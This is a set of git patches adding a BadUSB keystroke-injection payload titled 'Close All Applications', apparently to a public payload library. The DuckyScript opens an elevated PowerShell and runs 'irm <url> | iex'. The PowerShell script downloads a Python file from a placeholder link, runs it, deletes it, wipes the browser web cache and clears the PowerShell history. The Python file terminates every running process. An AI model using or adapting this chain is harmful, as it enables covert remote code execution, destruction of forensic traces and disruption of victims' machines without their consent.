From 541515bd5d03b9c8193637931ce5f4c9081e685b Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 11:34:48 +0200 Subject: [PATCH 1/3] Close All Applications --- .../CloseAllApplicationsInWindows/payload.txt | 44 +++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 payloads/library/execution/CloseAllApplicationsInWindows/payload.txt diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt new file mode 100644 index 0000000..5c1bd2a --- /dev/null +++ b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt @@ -0,0 +1,44 @@ +REM ##################################################### +REM # | +REM # Title : Close All Applications | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Execution | +REM # Target : Windows 10-11 | +REM # | +REM ##################################################### + +REM Plug-And-Play + +REM +REM 1. Open a powershell +REM 2. Download a Python script +REM 3. Execute it +REM 4. Remove Python script downloaded +REM 5. Delete powershell history +REM + +REM Reply with YOUR LINK. The Payload should be close_all_app.ps1 +DEFINE POWERSHEL_CODE example.com + +DELAY 2000 +GUI x +DELAY 250 +DOWNARROW +DOWNARROW +DOWNARROW +DOWNARROW +DOWNARROW +DOWNARROW +DOWNARROW +DOWNARROW +DOWNARROW +DOWNARROW +ENTER +DELAY 1000 +TAB +TAB +ENTER +DELAY 2000 +STRING irm POWERSHEL_CODE | iex +ENTER From fd1f9c16d886606db965c7d2799a02e3880bb86b Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 11:35:43 +0200 Subject: [PATCH 2/3] script --- .../CloseAllApplicationsInWindows/README.md | 28 +++++++++++++++++++ .../close_all_app.ps1 | 18 ++++++++++++ .../CloseAllApplicationsInWindows/script.py | 12 ++++++++ 3 files changed, 58 insertions(+) create mode 100644 payloads/library/execution/CloseAllApplicationsInWindows/README.md create mode 100644 payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1 create mode 100644 payloads/library/execution/CloseAllApplicationsInWindows/script.py diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/README.md b/payloads/library/execution/CloseAllApplicationsInWindows/README.md new file mode 100644 index 0000000..5ea11cf --- /dev/null +++ b/payloads/library/execution/CloseAllApplicationsInWindows/README.md @@ -0,0 +1,28 @@ +# Close All Applications - BADUSB ✅ + +A script used to close all target open applications. + +🟢 **Plug-And-Play** 🟢 + +**Category**: Execution + +## Description + +A script used to close all target open applications. + +Opens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history. + +## Getting Started + +### Dependencies + +* Internet Connection +* Windows 10,11 + +### Executing program + +* Plug in your device + +### Settings + +- No settings - Plug-And-Play diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1 b/payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1 new file mode 100644 index 0000000..9e147f4 --- /dev/null +++ b/payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1 @@ -0,0 +1,18 @@ +# Download Python script + +# Reply $scriptUrl with YOUR LINK. The Payload should be script.py +$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD" +$savePath = "$env:temp\script.py" +(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath) + +# Execute Python script +& python $savePath + +# Delete the downloaded script +Remove-Item $savePath + +# Clear the download history from the system's web cache +Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force + +# Clear the PowerShell command history +Clear-History diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/script.py b/payloads/library/execution/CloseAllApplicationsInWindows/script.py new file mode 100644 index 0000000..f50c816 --- /dev/null +++ b/payloads/library/execution/CloseAllApplicationsInWindows/script.py @@ -0,0 +1,12 @@ +try: + import psutil +except: + import os + os.system("pip install psutil") + import psutil + +for process in psutil.process_iter(): + try: + process.terminate() + except: + pass From 8e8c4542dd49ec051d2c068dfe53eb116ea3408c Mon Sep 17 00:00:00 2001 From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com> Date: Mon, 12 Jun 2023 14:54:50 -0400 Subject: [PATCH 3/3] Update payload.txt --- .../CloseAllApplicationsInWindows/payload.txt | 18 ++++-------------- 1 file changed, 4 insertions(+), 14 deletions(-) diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt index 5c1bd2a..5d6d187 100644 --- a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt +++ b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt @@ -19,26 +19,16 @@ REM 5. Delete powershell history REM REM Reply with YOUR LINK. The Payload should be close_all_app.ps1 -DEFINE POWERSHEL_CODE example.com +DEFINE POWERSHELL_CODE example.com DELAY 2000 GUI x DELAY 250 -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW -DOWNARROW +REPEAT 10 DOWNARROW ENTER DELAY 1000 -TAB -TAB +REPEAT 2 TAB ENTER DELAY 2000 -STRING irm POWERSHEL_CODE | iex +STRING irm POWERSHELL_CODE | iex ENTER